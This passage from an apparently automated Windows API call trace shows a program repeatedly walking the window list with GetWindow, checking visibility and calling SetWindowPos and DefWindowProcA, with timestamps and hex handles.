uCmd=0x2) returned 0x2009e [0057.564] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.564] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.564] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.564] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.564] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.564] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.564] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.564] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.564] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.564] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 
0x100e8 [0057.564] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.564] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.564] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.564] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.564] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.564] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.564] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.564] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.564] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.564] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.564] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.564] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.564] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.564] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.564] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.564] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.564] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.564] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.564] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.564] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.564] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.565] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.565] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.565] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.565] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.565] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.565] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.565] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.565] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.565] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa 
[0057.565] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.565] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.565] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.565] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.565] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.565] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.565] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.565] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.565] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.565] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.565] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.565] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.565] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.565] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.565] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.565] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.565] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.565] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.565] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.565] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.566] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.566] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.566] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.566] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.566] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.566] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.566] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.566] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.566] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.566] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.566] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.566] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 
0x10192 [0057.566] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.566] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.566] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.566] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.566] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.566] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.566] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.566] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.566] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.566] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.566] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.566] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.566] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.567] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.567] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.567] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.567] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.567] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.567] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.567] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.567] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.567] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.567] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.567] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.567] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.567] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.567] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.567] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.567] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.567] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.567] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.567] GetWindow (hWnd=0x10158, 
uCmd=0x2) returned 0x10150 [0057.567] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.567] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.567] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.567] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.567] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.568] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.568] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.568] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.568] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.568] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.568] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.568] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.568] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.568] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.568] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.568] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.568] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.568] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.568] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.568] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.568] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.568] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.568] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.568] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.568] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.568] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.568] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.568] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.568] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.568] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.569] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.569] 
GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.569] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.569] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.569] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.569] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.569] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.569] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.569] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.569] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.569] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.569] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.569] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.569] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.569] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.569] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.569] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.569] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.569] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.569] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.569] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.570] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.570] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.570] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.570] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.570] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.570] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.570] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.570] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.570] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.570] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.570] GetWindow 
(hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.570] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.570] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.570] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.570] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.570] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.570] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.570] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.570] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.570] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.570] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.570] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.570] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.570] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.570] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.570] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.570] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.571] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.571] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.571] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.571] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.571] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.571] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.571] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.571] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.571] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.571] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.571] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.571] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.571] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.571] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.571] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.571] 
GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.571] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.571] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.571] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.571] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.571] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.571] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.571] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.571] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.571] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.571] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.571] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.571] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.571] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.571] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.571] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.572] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.572] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.572] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.572] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.572] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.572] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.572] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.572] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.572] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.572] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.572] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.572] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.572] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.572] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.572] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.572] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 
0x7013a [0057.572] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.572] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.572] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.572] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.572] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.572] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.572] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.572] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.572] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.572] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.572] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.572] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.572] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.572] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.572] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.572] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.573] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.573] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.573] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.573] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.573] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.573] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.573] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.573] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.573] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.573] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.573] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.573] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.573] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.573] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.573] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.573] GetWindow (hWnd=0x2008e, 
uCmd=0x2) returned 0x20092 [0057.573] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.573] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.573] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.573] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.573] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.573] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.573] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.573] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.573] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.573] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.573] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.573] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.573] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.573] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.573] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.573] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.574] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.574] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.574] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.574] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.574] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.574] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.574] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.574] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.574] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.574] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.574] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.574] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.574] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.574] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.574] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, 
uFlags=0x13) returned 1 [0057.574] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.574] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.574] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.574] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.574] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.574] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.574] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.574] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.574] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.574] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.575] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.575] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.575] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.575] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.575] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.575] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.575] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.575] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.575] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.575] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.575] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.575] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.575] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.575] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.575] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.575] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.575] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.575] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.575] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.575] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.575] GetWindow (hWnd=0x101ac, 
uCmd=0x2) returned 0x601a4 [0057.575] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.575] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.575] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.575] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.575] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.575] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.575] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.575] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.576] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.576] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.576] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.576] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.576] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.576] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.576] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.576] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.576] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.576] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.576] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.576] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.576] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.576] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.576] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.576] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.576] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.576] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.576] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.576] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.576] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.576] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.576] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.576] 
GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.576] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.577] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.577] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.577] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.577] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.577] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.577] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.577] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.577] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.577] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.577] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.577] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.577] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.577] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.577] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.577] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.577] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 